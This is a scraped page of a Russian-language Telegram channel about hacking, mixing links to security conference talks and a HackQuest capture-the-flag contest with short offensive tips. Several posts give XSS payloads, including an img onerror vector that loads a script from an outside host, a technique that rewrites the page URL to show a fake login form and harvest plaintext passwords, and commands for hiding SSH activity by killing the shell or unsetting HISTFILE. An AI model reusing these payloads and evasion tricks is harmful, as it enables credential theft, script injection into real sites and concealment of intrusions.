Telegram Web Link
Все хакеры - как хакеры. А я - богиня!
❤‍🔥1
Сегодня второй день Build'а, если кому интересно. Будут опять что-то презентовать и рассказывать про будущее MS.

Трансляция тут https://channel9.msdn.com/
❤‍🔥1
У тебя спина белая
Классика
Один из коротких векторов для выполнения JS при XSS атаке:
<q/oncut=alert()>X

Событие oncut сработает, если пользователь попытается вырезать содержимое, т.е. выделет текст и нажмет CTRL+X.
Эксплуатабельность низкая, но для bugbounty, когда жесткие ограничения на длину вектора - сойдёт.
❤‍🔥1
А это более прикольная альтернатива alert'у
<img src onerror="(function(u){var d=document,s=d.createElement('scri'+'pt');s.src=u;(d.head||d.documentElement).appendChild(s);s.parentNode.removeChild(s);}('//bo0om.ru/xss.js'));">

Хоть и боян
❤‍🔥1
А вот и доклады с defcon russia подъехали!

Ломаем автомобили с Алексеем Синцовым. Доклад - Testing CAN network with help of CANToolz
Видео - http://www.youtube.com/watch?v=UbkhBIhbh_o
Презентация -
http://www.slideshare.net/AlexeySintsov/testing-can-network-with-help-of-cantoolz
Репозиторий - https://github.com/eik00d/CANToolz

Доклад Александра Большева - Never Trust Your Inputs or How To Fool an ADC
Видео - http://www.youtube.com/watch?v=jH1bgIGUNc0
Презентация -
http://www.slideshare.net/DefconRussia/dcg-25-never-trust-your-inputs-or-how-to-fool-an-adc
❤‍🔥1
Если ты подключен к SSH и хочешь скрыть, что делалось на машине, полезно после всех действий выполнить kill -9 $$

Это убет собственный процесс, а последние команды в .bash_history не запишутся.

Или можно ввести unset HISTFILE (с пробелом в начале), чтобы не писать в историю вовсе.
❤‍🔥1
Кстати, ночью стартует HackQuest!
http://www.phdays.ru/press/news/46226/
Будет много веба, задача - найти уязвимость, успешно ее проэксплуатировать и достать некий секрет (он же флаг).
Даже если не собираешься что-то выигрывать, можешь попробовать найти уязимости на одном из сайтов, задания будут как легкие, так и хардкорные.
Когда стартанём, еще разок напомню ;)
❤‍🔥1
Итак, стартует HackQuest

www.tg-me.com/wlrm_phd_hq_bot

А вот и ссылка на участие :)

Да-да, прямо в telegram!

Удачи!
❤‍🔥1
Поздравляем победителей HackQuest'а!

1. 11000   firsov
2. 8300 cdump
3. 8300 DarkCaT
4. 8300 rrockru
5. 7000 invent
6. 7000 MERRON
7. 6200 FessDom
8. 5900 AV1ct0r
9. 5500 kreon
10. 5300 yngwie007
❤‍🔥1
Трансляция 12 встречи #DC7499 доступна по ссылке https://youtu.be/F5p_NW5q48M
Программа докладов http://defcon.su/12/
❤‍🔥1
Недавно наткнулся на расширение файла php7.

http://lab.onsec.ru/2016/04/new-php-extensions-should-be-hardcoded.html
❤‍🔥1
Атакуя с помощью XSS, можно динамически подменить текущий url страницы в пределах одного сайта.
Делается это так:
window.history.replaceState(null, '', 'https://site.com/login');
Очень эффективно отобразить фейковое окно аутентификации (мол, сессия твоя истекла) и подменить url. Запоминалки паролей заполнят нужные поля, да и рядовой юзер (даже продвинутый) поведётся на фейк внутри лигитимного сайта. Я бы повёлся. И ты.
Так убиваются два зайца (царствие им небесное) - не требуется воровать cookie, так как они в большинстве случаев уже с флагом HttpOnly и атакующий получает пароли plaintext'ом!
1
Дорогая, это не то, что ты подумала!
2025/07/09 00:06:48
Back to Top
HTML Embed Code: